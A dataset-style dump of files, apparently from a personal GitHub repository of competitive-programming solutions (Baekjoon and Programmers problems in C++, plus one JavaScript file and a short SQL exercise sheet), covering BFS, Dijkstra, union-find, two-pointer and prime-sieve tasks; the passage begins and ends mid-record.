"avg_line_length": 20.571428298950195, "blob_id": "f72b39b2b603060dea1e0e7a41658e49e4a12d7c", "content_id": "205913b7d63651dae8d61d879edd58ba49f091af", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1072, "license_type": "no_license", "max_line_length": 66, "num_lines": 49, "path": "/programmers/Level 2/printer.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "//programmers Level 2: 프린터\n//2021-10-06\n#include <iostream>\n#include <vector>\n#include <algorithm>\n#include <queue>\nusing namespace std;\n\nint solution(vector<int> priorities, int location) {\n priority_queue<int, vector<int>> pq;\n queue<pair<int, int>> q; \n vector<int> v;\n int answer = 0;\n\n for(int i = 0 ; i < priorities.size() ; i++) {\n q.push(make_pair(priorities[i], i)); //중요도, 문서\n pq.push(priorities[i]);\n }\n \n int max = pq.top();\n \n while(!q.empty()) {\n pair<int,int> cur = q.front();\n \n if(cur.first < max) {\n while(cur.first != max) {\n q.push(q.front());\n q.pop();\n cur = q.front();\n }\n }\n else {\n v.push_back(cur.second);\n q.pop(); pq.pop();\n max = pq.top();\n }\n }\n \n answer = (find(v.begin(), v.end(), location) - v.begin()) + 1;\n \n return answer;\n}\n\nint main() {\n int answer = solution({2, 1, 3, 2}, 2);\n cout << answer;\n\n return 0;\n}" }, { "alpha_fraction": 0.31910276412963867, "alphanum_fraction": 0.3444283604621887, "avg_line_length": 18.471830368041992, "blob_id": "551f68828ecb991dfd148ccd749af4f24655fbf8", "content_id": "9c59a31f8f472bc5a4b684830ac81cc277c881d5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2822, "license_type": "no_license", "max_line_length": 62, "num_lines": 142, "path": "/BOJ/Implementation/17144.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 17144번: 미세먼지 안녕!\nDATE: 2022-03-15\n*/\n#include <iostream>\n#include <vector>\n#include <cstring>\n#define MAX 51\nusing namespace std;\n\nint arr[MAX][MAX], tmp[MAX][MAX];\nint up, down;\nint dr[4] = {-1, 0, 1, 0};\nint dc[4] = {0, 1, 0, -1};\nint r, c, t;\nvector<pair<int,int>> dust;\n\nvoid spread(){\n for(int i = 0 ; i < dust.size() ; i++){\n int row = dust[i].first;\n int col = dust[i].second;\n int value = arr[row][col];\n int cnt = 0;\n\n for(int j = 0 ; j < 4 ; j++){\n int nr = row + dr[j];\n int nc = col + dc[j];\n\n if(nr < 1 || nc < 1 || nr > r || nc > c) continue;\n if(arr[nr][nc] == -1) continue;\n\n tmp[nr][nc] += value / 5;\n cnt++;\n }\n \n tmp[row][col] += value - (value / 5) * cnt;\n }\n}\n\nvoid upside(){ // 반시계 방향\n int a, b = 0;\n\n for(int i = 2 ; i <= c ; i++){\n a = tmp[up][i];\n 
tmp[up][i] = b;\n b = a;\n }\n\n for(int i = up - 1 ; i >= 1 ; i--){\n a = tmp[i][c];\n tmp[i][c] = b;\n b = a;\n }\n\n for(int i = c - 1 ; i >= 1 ; i--){\n a = tmp[1][i];\n tmp[1][i] = b;\n b = a;\n }\n\n for(int i = 2 ; i <= up ; i++){\n a = tmp[i][1];\n tmp[i][1] = b;\n b = a;\n }\n}\n\nvoid downside(){ // 시계 방향\n int a, b = 0;\n\n for(int i = 2 ; i <= c ; i++){\n a = tmp[down][i];\n tmp[down][i] = b;\n b = a;\n }\n\n for(int i = down + 1 ; i <= r ; i++){\n a = tmp[i][c];\n tmp[i][c] = b;\n b = a;\n }\n\n for(int i = c - 1 ; i >= 1 ; i--){\n a = tmp[r][i];\n tmp[r][i] = b;\n b = a;\n }\n\n for(int i = r - 1 ; i >= down ; i--){\n a = tmp[i][1];\n tmp[i][1] = b;\n b = a;\n }\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int ans = 0;\n cin >> r >> c >> t;\n\n for(int i = 1 ; i <= r ; i++){\n for(int j = 1 ; j <= c ; j++){\n cin >> arr[i][j];\n if(arr[i][j] == -1){\n if(up == 0) up = i;\n else down = i;\n }\n else if(arr[i][j] > 0) dust.push_back({i,j});\n }\n }\n\n while(t--){\n memset(tmp, 0, sizeof(tmp));\n\n // 미세먼지 확산\n spread();\n\n // 공기청정기 작동\n upside();\n downside();\n\n dust.clear();\n\n for(int i = 1 ; i <= r ; i++){\n for(int j = 1 ; j <= c ; j++){\n if(arr[i][j] == -1) continue;\n arr[i][j] = tmp[i][j];\n dust.push_back({i, j});\n }\n }\n }\n\n for(int i = 1 ; i <= r ; i++){\n for(int j = 1 ; j <= c ; j++){\n if(arr[i][j] > 0) ans += arr[i][j];\n }\n }\n\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.4386920928955078, "alphanum_fraction": 0.4611716568470001, "avg_line_length": 19.690141677856445, "blob_id": "0e14c5974c6bca22ba3be6b50b774ad0f4dba969", "content_id": "751fa441b2d07ebcf46a03b8e97994a882284c40", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1488, "license_type": "no_license", "max_line_length": 87, "num_lines": 71, "path": "/BOJ/Dijkstra/18352.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UHC", "text": "/*\nBOJ 18352번: 특정 거리의 도시 찾기\nDATE: 2021-02-25\nDijkstra Algorithm\n*/\n#include <iostream>\n#include <vector>\n#include <queue>\n#define MAX 300001\n#define INF 1e9\nusing namespace std;\n\nvector<pair<int, int>> graph[MAX];\nint d[MAX];\n\nvoid dijkstra(int start){\n priority_queue<pair<int, int>, vector<pair<int, int>>, greater<pair<int, int>>> pq;\n pq.push(make_pair(0, start));\n d[start] = 0;\n\n while(!pq.empty()){\n int cost = pq.top().first;\n int now = pq.top().second;\n pq.pop();\n\n for(int i = 0 ; i < graph[now].size() ; i++){\n int next = graph[now][i].first;\n int nCost = cost + graph[now][i].second;\n if(nCost < d[next]){\n d[next] = nCost;\n pq.push(make_pair(d[next], next));\n }\n }\n }\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n priority_queue<int, vector<int>, greater<int>> pq;\n int n, m, k, x, check;\n cin >> n >> m >> k >> x;\n\n for(int i = 0 ; i < m ; i++){\n int a, b;\n cin >> a >> b;\n graph[a].push_back(make_pair(b, 1)); \n }\n\n for(int i = 1 ; i <= n ; i++){\n d[i] = INF;\n }\n\n dijkstra(x);\n\n for(int i = 1 ; i <= n ; i++){\n if(d[i] == k) {\n pq.push(i);\n }\n }\n\n if(pq.empty())\n cout << -1;\n else{\n while(!pq.empty()){\n cout << pq.top() << \"\\n\";\n pq.pop();\n }\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.38260868191719055, "alphanum_fraction": 0.4153846204280853, "avg_line_length": 20.68115997314453, "blob_id": "4d7bbbd0cb0e20347cc2d86306888bbda422cba5", "content_id": "4c12d3aec0ce98165e176f957de05239346d55a5", "detected_licenses": [], "is_generated": false, "is_vendor": false, 
"language": "C++", "length_bytes": 1507, "license_type": "no_license", "max_line_length": 82, "num_lines": 69, "path": "/BOJ/BFS_DFS/2665.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UHC", "text": "/*\nBOJ 2665번: 미로만들기\nDATE: 2021-02-25\nBFS\n*/\n#include <iostream>\n#include <vector>\n#include <queue>\n#include <string.h>\n#define MAX 51\nusing namespace std;\n\nint arr[MAX][MAX];\nint visited[MAX][MAX];\nint dx[] = {-1, 0, 1, 0};\nint dy[] = {0, 1 , 0, -1};\nint n;\n\nvoid bfs(){\n queue<pair<int, int>> q;\n\n memset(visited, -1, sizeof(visited));\n q.push(make_pair(0, 0));\n visited[0][0] = 0;\n\n while(!q.empty()){\n int x = q.front().first;\n int y = q.front().second;\n q.pop();\n\n for(int i = 0 ; i < 4 ; i++){\n int nx = x + dx[i];\n int ny = y + dy[i];\n\n if(nx >= 0 && nx < n && ny >= 0 && ny < n && arr[nx][ny]){ //1\n if(visited[nx][ny] == -1 || visited[nx][ny] > visited[x][y]){\n visited[nx][ny] = visited[x][y];\n q.push(make_pair(nx, ny));\n }\n }\n else if(nx >= 0 && nx < n && ny >= 0 && ny < n && !arr[nx][ny]){ //0\n if(visited[nx][ny] == -1 || visited[nx][ny] > visited[x][y] + 1){\n visited[nx][ny] = visited[x][y] + 1;\n q.push(make_pair(nx, ny));\n }\n }\n }\n }\n\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n cin >> n;\n\n for (int i = 0 ; i < n; i++) {\n\t\tstring str;\n\t\tcin >> str;\n\t\tfor (int j = 0 ; j < n ; j++) {\n\t\t\tarr[i][j] = str[j] - '0';\n\t\t}\n\t}\n\n bfs();\n\n cout << visited[n-1][n-1];\n \n return 0;\n}" }, { "alpha_fraction": 0.4008714556694031, "alphanum_fraction": 0.4466230869293213, "avg_line_length": 14.333333015441895, "blob_id": "0cb4573c036dc7b314c81c7c494b133abeb46a18", "content_id": "40d51bc43ca76a5cc5e723601cfaa135c6c06815", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 461, "license_type": "no_license", "max_line_length": 58, "num_lines": 30, "path": "/BOJ/Greedy/11399.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 11399번: ATM\n2021-03-29\n*/\n#include <iostream>\n#include <algorithm>\nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, time=0;\n cin >> n;\n\n int arr[n];\n for(int i = 0 ; i < n ; i++){\n cin >> arr[i];\n }\n\n sort(arr, arr + n); \n\n for(int i = 0 ; i < n ; i++){\n for(int j = 0 ; j <= i ; j++){\n time += arr[j];\n }\n }\n\n cout << time;\n\n return 0;\n}" }, { "alpha_fraction": 0.45837321877479553, "alphanum_fraction": 0.4803827702999115, "avg_line_length": 19.115385055541992, "blob_id": "45c626752d6bbb6b3e10d86e52d6a8cc43c690b8", "content_id": "26f317f589c550c9bb64ed973c22e949907621a7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1057, "license_type": "no_license", "max_line_length": 58, "num_lines": 52, "path": "/BOJ/Graph Theory/1717.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UHC", "text": "/*\nBOJ 1717번: 집합의 표현\nDATE: 2021-02-15\nUnion-Find\n*/\n#include <iostream>\nusing namespace std;\n\nint getParent(int parent[], int x){\n if(parent[x] == x) return x;\n return parent[x] = getParent(parent, parent[x]);\n}\n\nvoid unionParent(int parent[], int a, int b){\n a = getParent(parent, a);\n b = getParent(parent, b);\n if(a < b) parent[b] = a;\n else parent[a] = b;\n}\n\nint findParent(int parent[], int a, int b){\n a = getParent(parent, a);\n b = getParent(parent, b);\n if(a == b) return 1;\n else return 0;\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); 
cout.tie(0);\n int n, m;\n cin >> n >> m;\n\n int parent[n+1];\n for(int i = 0 ; i <= n ; i++){\n parent[i] = i;\n }\n\n for(int i = 0 ; i < m ; i++){\n int x, y, z;\n cin >> x >> y >> z;\n\n if(x == 0) unionParent(parent, y, z);\n else if(x == 1){\n if(findParent(parent, y, z))\n cout << \"YES\" << \"\\n\";\n else\n cout << \"NO\" << \"\\n\";\n }\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.42279940843582153, "alphanum_fraction": 0.45743146538734436, "avg_line_length": 18.828571319580078, "blob_id": "2eb1ded455c523c2865e0cfe1b0e5a3af5890669", "content_id": "d66228c8318f7c98058af5ba6d678e9afe65fc00", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 705, "license_type": "no_license", "max_line_length": 81, "num_lines": 35, "path": "/BOJ/Mathematics/6219.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 6219번: 소수의 자격\n2022-01-20\n*/\n#include <iostream>\n#include <math.h>\n#include <algorithm>\nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int a, b, d;\n int ans = 0;\n \n cin >> a >> b >> d;\n\n int prime[b + 1];\n char ch = d + '0';\n\n for(int i = 2 ; i <= b ; i++) prime[i] = i;\n\n for(int i = 2 ; i <= sqrt(b) ; i++){\n if(prime[i] == 0) continue;\n for(int j = i * i ; j <= b ; j += i) prime[j] = 0;\n }\n\n for(int i = a ; i <= b ; i++) {\n string str = to_string(prime[i]);\n if(prime[i] != 0 && find(str.begin(), str.end(), ch) != str.end()) ans++;\n }\n\n cout << ans;\n \n return 0;\n}" }, { "alpha_fraction": 0.4463452696800232, "alphanum_fraction": 0.48522549867630005, "avg_line_length": 14.707317352294922, "blob_id": "5fdcf43acdfee96fdfa5686cf8cc91f2f6e249ae", "content_id": "e0715134fb6036452b233f3f42996ed0c668b92e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 647, "license_type": "no_license", "max_line_length": 64, "num_lines": 41, "path": "/BOJ/BFS_DFS/15651.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 15651번: N과 M (3)\n2022-01-05\nBacktracking\n*/\n#include <iostream>\n#include <vector>\n#define MAX 8\nusing namespace std;\n\nint n, m;\nvector<int> num;\nvector<int> ans; \n\nvoid print(){\n for(int i = 0 ; i < ans.size() ; i++) cout << ans[i] << \" \";\n cout << '\\n';\n}\n\nvoid dfs(int cnt){\n if(cnt == m) {\n print();\n return;\n }\n\n for(int i = 0 ; i < n ; i++){\n ans.push_back(num[i]);\n dfs(cnt + 1);\n ans.pop_back();\n }\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n cin >> n >> m;\n\n for(int i = 0 ; i < n ; i++) num.push_back(i + 1);\n dfs(0);\n\n return 0;\n}" }, { "alpha_fraction": 0.3421269655227661, "alphanum_fraction": 0.37922507524490356, "avg_line_length": 18.26984214782715, "blob_id": "45876866444558b2f0b8eb4daa481cac95cff02a", "content_id": "2b19317e328c2a0456ebe92d44bd0d6aa0f9e623", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1239, "license_type": "no_license", "max_line_length": 79, "num_lines": 63, "path": "/BOJ/BFS_DFS/7576.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 7576번: 토마토\nDATE: 2022-02-02\nBFS\n*/\n#include <iostream>\n#include <queue>\n#define MAX 1000\nusing namespace std;\n\nqueue<pair<int,int>> q;\nint m, n;\nint arr[MAX][MAX];\nint dx[4] = {-1, 0, 1, 0};\nint dy[4] = {0, 1, 0, -1};\n\nvoid bfs() {\n while(!q.empty()) {\n int x = q.front().first;\n int y = q.front().second;\n\n q.pop();\n\n 
for(int i = 0 ; i < 4 ; i++) {\n int nx = x + dx[i];\n int ny = y + dy[i];\n\n if(nx < 0 || ny < 0 || nx >= n || ny >= m || arr[nx][ny]) continue;\n\n q.push({nx, ny});\n arr[nx][ny] = arr[x][y] + 1;\n }\n }\n}\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int ans = 0;\n cin >> m >> n;\n\n for(int i = 0 ; i < n ; i++) {\n for(int j = 0 ; j < m ; j++) {\n cin >> arr[i][j];\n if(arr[i][j] == 1) q.push({i, j});\n }\n }\n\n bfs();\n\n for(int i = 0 ; i < n ; i++) {\n for(int j = 0 ; j < m ; j++) {\n if(arr[i][j] == 0) { // 익지 않은 토마토 존재\n cout << -1;\n return 0;\n }\n else if(arr[i][j] > ans) ans = arr[i][j]; \n }\n }\n\n cout << ans - 1;\n\n return 0;\n}" }, { "alpha_fraction": 0.3927038609981537, "alphanum_fraction": 0.42274677753448486, "avg_line_length": 16.60377311706543, "blob_id": "7b919b6cc71f4697d7ef39806fe974284dc40381", "content_id": "df09991450e393f09adf0801f1cd1a684f1a19d1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 946, "license_type": "no_license", "max_line_length": 60, "num_lines": 53, "path": "/BOJ/Two Pointer/1644.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1644번: 소수의 연속합\n2021-12-28\nTwo pointer\n*/\n#include <iostream>\n#include <vector>\n#include <math.h>\nusing namespace std;\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n vector<int> prime;\n int n;\n int start = 0, end = 0, sum = 0, ans = 0;\n \n cin >> n;\n\n if(n == 1) {\n cout << 0;\n return 0;\n }\n\n int arr[n + 1];\n fill(arr, arr + n + 1, true);\n arr[1] = false;\n\n for(int i = 2 ; i <= sqrt(n) ; i++) {\n if(!arr[i]) continue;\n for(int j = i * i ; j <= n ; j += i) arr[j] = false;\n }\n\n for(int i = 2 ; i <= n ; i++) {\n if(arr[i]) prime.push_back(i);\n }\n\n while(end <= prime.size()) {\n if(sum < n) {\n sum += prime[end];\n end++;\n }\n else if(sum >= n) {\n sum -= prime[start];\n start++;\n }\n\n if(sum == n) ans++;\n }\n\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.6214510798454285, "alphanum_fraction": 0.6585173606872559, "avg_line_length": 20.86206817626953, "blob_id": "a34090eadfd8794190cd3d0f0d9a5247c03e76aa", "content_id": "d97d06a259741c215153b88e6a1da188c7448fbb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1364, "license_type": "no_license", "max_line_length": 98, "num_lines": 58, "path": "/programmers/SQL/String, Date.md", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "# String, Date\n\n**[1. 루시와 엘라 찾기 (Level 2)](https://programmers.co.kr/learn/courses/30/lessons/59046)**\n\n```sql\nSELECT ANIMAL_ID, NAME, SEX_UPON_INTAKE\nFROM ANIMAL_INS\nWHERE NAME IN ('Lucy', 'Ella', 'Pickle', 'Rogan', 'Sabrina', 'Mitty')\nORDER BY ANIMAL_ID\n```\n\n<br/>\n\n**[2. 이름에 el이 들어가는 동물 찾기 (Level 2)](https://programmers.co.kr/learn/courses/30/lessons/59047)**\n\n```sql\nSELECT ANIMAL_ID, NAME\nFROM ANIMAL_INS\nWHERE NAME LIKE '%el%' and ANIMAL_TYPE = 'Dog'\nORDER BY NAME\n```\n\n<br/>\n\n**[3. 중성화 여부 파악하기 (Level 2)](https://programmers.co.kr/learn/courses/30/lessons/59409)**\n\n```sql\nSELECT ANIMAL_ID, NAME,\n CASE\n WHEN SEX_UPON_INTAKE = 'Neutered Male' THEN \"O\"\n WHEN SEX_UPON_INTAKE = \"Spayed Female\" THEN \"O\"\n ELSE \"X\"\n END AS '중성화'\nFROM ANIMAL_INS\nORDER BY ANIMAL_ID\n```\n\n<br/>\n\n**[4. 
오랜 기간 보호한 동물(2) (Level 3)](https://programmers.co.kr/learn/courses/30/lessons/59411)**\n\n```sql\nSELECT A.ANIMAL_ID, B.NAME\nFROM ANIMAL_INS A, ANIMAL_OUTS B\nWHERE A.ANIMAL_ID = B.ANIMAL_ID\nORDER BY B.DATETIME - A.DATETIME DESC\nLIMIT 2\n```\n\n<br/>\n\n**[5. DATETIME에서 DATE로 형 변환 (Level 2)](https://programmers.co.kr/learn/courses/30/lessons/59414)**\n\n```sql\nSELECT ANIMAL_ID, NAME, DATE_FORMAT(DATETIME, '%Y-%m-%d') as 날짜\nFROM ANIMAL_INS\nORDER BY ANIMAL_ID\n```\n" }, { "alpha_fraction": 0.42514970898628235, "alphanum_fraction": 0.4565868377685547, "avg_line_length": 15.317072868347168, "blob_id": "ce48eee024318602496c1f27dcb6ac37dc2d3ffe", "content_id": "e23b8cc1747152cc99e71cafd73337c871ef0466", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 678, "license_type": "no_license", "max_line_length": 58, "num_lines": 41, "path": "/BOJ/Two Pointer/2230.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 2230번: 수 고르기\nDATE: 2022-02-08\nTwo pointer\n*/\n#include <iostream>\n#include <algorithm>\nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, m;\n int start, end, minVal = 2e9;\n cin >> n >> m;\n\n int arr[n];\n\n for(int i = 0 ; i < n ; i++) cin >> arr[i];\n sort(arr, arr + n);\n\n start = 0; end = 0;\n\n while(end < n) {\n int diff = arr[end] - arr[start];\n\n if(diff == m) {\n minVal = m;\n break;\n }\n\n if(diff < m) end++;\n else {\n minVal = min(minVal, diff);\n start++;\n }\n }\n\n cout << minVal;\n\n return 0;\n}" }, { "alpha_fraction": 0.5655527114868164, "alphanum_fraction": 0.5938303470611572, "avg_line_length": 17.571428298950195, "blob_id": "944ee0662e665b263d0aa64c8e82f0f03155c76a", "content_id": "91b22b4906353c94669c78ebbc16ef44cd41eac0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 411, "license_type": "no_license", "max_line_length": 52, "num_lines": 21, "path": "/programmers/Level 1/divisible_number_array.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nprogrammers Level 1: 나누어 떨어지는 숫자 배열\n2022-03-21\n*/\n#include <vector>\n#include <algorithm>\nusing namespace std;\n\nvector<int> solution(vector<int> arr, int divisor) {\n vector<int> answer;\n \n sort(arr.begin(), arr.end());\n \n for(auto i : arr){\n if(i % divisor == 0) answer.push_back(i);\n }\n \n if(answer.empty()) answer.push_back(-1);\n \n return answer;\n}" }, { "alpha_fraction": 0.5655737519264221, "alphanum_fraction": 0.5901639461517334, "avg_line_length": 15.681818008422852, "blob_id": "bbbda206e74f2f37ab5b32635cf77e0fbc30fb2e", "content_id": "6eb1da88c2519cb8b95d9c84f4798f36a6abb264", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 408, "license_type": "no_license", "max_line_length": 43, "num_lines": 22, "path": "/programmers/Level 1/gcd_lcm.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nprogrammers Level 1: 최대공약수와 최소공배수\n2022-03-19\n*/\n#include <string>\n#include <vector>\n\nusing namespace std;\n\nint gcd(int a, int b){\n return b ? 
gcd(b, a % b) : a;\n}\n\nvector<int> solution(int n, int m) {\n vector<int> answer;\n int res = gcd(n, m);\n \n answer.push_back(res); // 최대공약수\n answer.push_back(n * m / res); // 최소공배수\n \n return answer;\n}" }, { "alpha_fraction": 0.3871449828147888, "alphanum_fraction": 0.4275037348270416, "avg_line_length": 14.581395149230957, "blob_id": "dc0f887e86f66ce5338ea9eb1efc7f5f3da2a995", "content_id": "74dc57f2ff1c7b2ffdafeaf5fb942644be5e496c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 679, "license_type": "no_license", "max_line_length": 58, "num_lines": 43, "path": "/BOJ/Two Pointer/3273.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 3273번: 두 수의 합\nDATE: 2021-06-01\nTwo Pointer\n*/\n#include <iostream>\n#include <algorithm>\nusing namespace std;\n\nint arr[100001];\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, x;\n cin >> n;\n\n int start = 0, end = n - 1, sum = 0, ans = 0;\n\n for (int i = 0; i < n; i++) {\n cin >> arr[i];\n }\n\n sort(arr, arr + n);\n\n cin >> x;\n\n while (start < end) {\n if (arr[start] + arr[end] == x) {\n ans++;\n start++;\n }\n else if (arr[start] + arr[end] > x) {\n end--;\n }\n else {\n start++;\n }\n }\n\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.5264151096343994, "alphanum_fraction": 0.5584905743598938, "avg_line_length": 20.239999771118164, "blob_id": "2c025ecc499aec55e5c0b4737434d965ec7f1e08", "content_id": "536a8475af2c8a80058fc2f69a7d9680a742b7f6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 536, "license_type": "no_license", "max_line_length": 96, "num_lines": 25, "path": "/BOJ/Implementation/5635.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 5635번: 생일\nDATE: 2022-05-26\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n;\n cin >> n; \n\n vector<pair<pair<int,int>, pair<int, string>>> v(n);\n\n for(int i = 0 ; i < n ; i++){\n cin >> v[i].second.second >> v[i].second.first >> v[i].first.second >> v[i].first.first;\n }\n\n sort(v.begin(), v.end());\n cout << v.back().second.second << \"\\n\" << v.front().second.second;\n\n return 0;\n}" }, { "alpha_fraction": 0.35738831758499146, "alphanum_fraction": 0.38969072699546814, "avg_line_length": 20.101449966430664, "blob_id": "d05f76d03b2e547b09b7b2a883511f660f3627a4", "content_id": "6b01d2aab9b19bae71a528dcb252ed0bd23c3b7e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1457, "license_type": "no_license", "max_line_length": 83, "num_lines": 69, "path": "/BOJ/BFS_DFS/1012.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1012번: 유기농 배추\nDATE: 2021-10-25\nBFS\n*/\n#include <iostream>\n#include <string.h>\n#include <queue>\nusing namespace std;\n\nint arr[50][50];\nbool visited[50][50];\nint m, n;\nint dx[4] = {-1, 0, 1, 0};\nint dy[4] = {0, 1, 0, -1};\n\nvoid bfs(int x, int y) {\n queue<pair<int,int>> q;\n\n q.push(make_pair(x, y));\n visited[x][y] = true;\n\n while(!q.empty()) {\n pair<int, int> cur = q.front();\n q.pop();\n\n for(int i = 0 ; i < 4 ; i++) {\n int nx = cur.first + dx[i];\n int ny = cur.second + dy[i];\n \n if(nx < 0 || ny < 0 || nx >= n || ny >= m || visited[nx][ny]) continue;\n if(arr[nx][ny] == 0) continue;\n \n q.push(make_pair(nx, ny));\n visited[nx][ny] = 
true;\n }\n }\n}\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int t, k, x, y;\n cin >> t;\n\n for(int i = 0 ; i < t ; i++) {\n int cnt = 0;\n cin >> m >> n >> k;\n memset(arr, 0, sizeof(arr));\n memset(visited, false, sizeof(visited));\n\n for(int j = 0 ; j < k ; j++) {\n cin >> x >> y;\n arr[y][x] = 1;\n }\n\n for(int j = 0 ; j < n ; j++) {\n for(int k = 0 ; k < m ; k++) {\n if(arr[j][k] == 1 && !visited[j][k]) {\n cnt++;\n bfs(j, k);\n }\n }\n }\n\n cout << cnt << '\\n';\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.3900826573371887, "alphanum_fraction": 0.42975205183029175, "avg_line_length": 23.239999771118164, "blob_id": "d06d15ac011ca165246bef7699f95db26391a680", "content_id": "cee333d89aa8e7c9d469e70de4531090e2ee7936", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 605, "license_type": "no_license", "max_line_length": 73, "num_lines": 25, "path": "/programmers/Level 1/push_keypad.js", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nprogrammers Level 1: Push keypad\n2020 KAKAO Internship\n2021-12-21\n*/\nfunction solution(board, moves) {\n let answer = 0;\n let stack = [];\n\n for (let i = 0; i < moves.length; i++) {\n for (let j = 0; j < board.length; j++) {\n if (board[j][moves[i] - 1] > 0) {\n if (stack[stack.length - 1] === board[j][moves[i] - 1]) {\n answer += 2;\n stack.pop();\n } else stack.push(board[j][moves[i] - 1]);\n\n board[j][moves[i] - 1] = 0;\n break;\n }\n }\n }\n\n return answer;\n}" }, { "alpha_fraction": 0.3349548280239105, "alphanum_fraction": 0.36970117688179016, "avg_line_length": 21.5, "blob_id": "6266134139d6b1b74aad188f3a51ab0b409f13b0", "content_id": "f8802503f8f3d5b07632ff0a1b3ac86f00a750ea", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1553, "license_type": "no_license", "max_line_length": 94, "num_lines": 64, "path": "/BOJ/BFS_DFS/17070.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 17070번: 파이프 옮기기 1\n2021-12-20\n*/\n#include <iostream>\n#define MAX 32\nusing namespace std;\n\nint n, ans = 0;\nint arr[MAX][MAX];\nbool visited[MAX][MAX] = {false, };\nint dx[3] = {0, 1, 1}; //가로, 세로, 대각선\nint dy[3] = {1, 0, 1};\n\nvoid dfs(int x, int y, int dir) {\n //d => 0: 가로 1: 세로 2: 대각선\n\n if(x == n - 1 && y == n - 1) {\n ans++;\n return;\n }\n\n visited[x][y] = true;\n\n for(int i = 0 ; i < 3 ; i++) {\n if(dir == 0 && i == 1) continue; // 파이프 가로 && 세로 방향으로 이동\n else if(dir == 1 && i == 0) continue; // 파이프 세로 && 가로 방향으로 이동\n else {\n int nx = x + dx[i];\n int ny = y + dy[i];\n\n if(nx < 0 || ny < 0 || nx >= n || ny >= n) continue;\n \n if(i < 2) { // 가로, 세로로 이동\n if(!arr[nx][ny] && !visited[nx][ny]) {\n dfs(nx, ny, i);\n visited[nx][ny] = false;\n }\n }\n else { //대각선\n if(!arr[nx][ny] && !arr[nx - 1][ny] && !arr[nx][ny - 1] && !visited[nx][ny]) {\n dfs(nx, ny, i);\n visited[nx][ny] = false;\n }\n }\n }\n }\n}\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0); \n cin >> n;\n\n for(int i = 0 ; i < n ; i++) {\n for(int j = 0 ; j < n ; 